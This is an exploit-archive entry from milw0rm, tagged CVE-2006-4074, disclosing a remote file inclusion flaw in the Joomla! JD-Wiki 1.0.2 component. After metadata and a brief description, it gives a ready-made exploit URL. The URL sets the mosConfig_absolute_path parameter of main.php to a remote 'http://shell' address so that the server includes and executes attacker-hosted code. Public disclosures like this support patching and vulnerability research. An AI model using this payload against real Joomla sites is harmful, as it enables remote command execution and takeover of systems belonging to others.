Joomla! Component JD-Wiki 1.0.2 - Remote File Inclusion

Author: jank0
type: webapps
platform: php
port: 
date_added: 2006-08-06 
date_updated:  
verified: 1 
codes: OSVDB-27835;CVE-2006-4074 
tags: 
aliases:  
screenshot_url:  
application_url: 

####################################################################################
#JD-Wiki Remote File Include
------------------------------------------------------------------------------------
JD-Wiki is the Joomla! integration of the nice DokuWiki.
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating
documentation of any kind.
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell


Contact: irc.undernet.org #hackbsd & #ircmasters

# milw0rm.com [2006-08-07]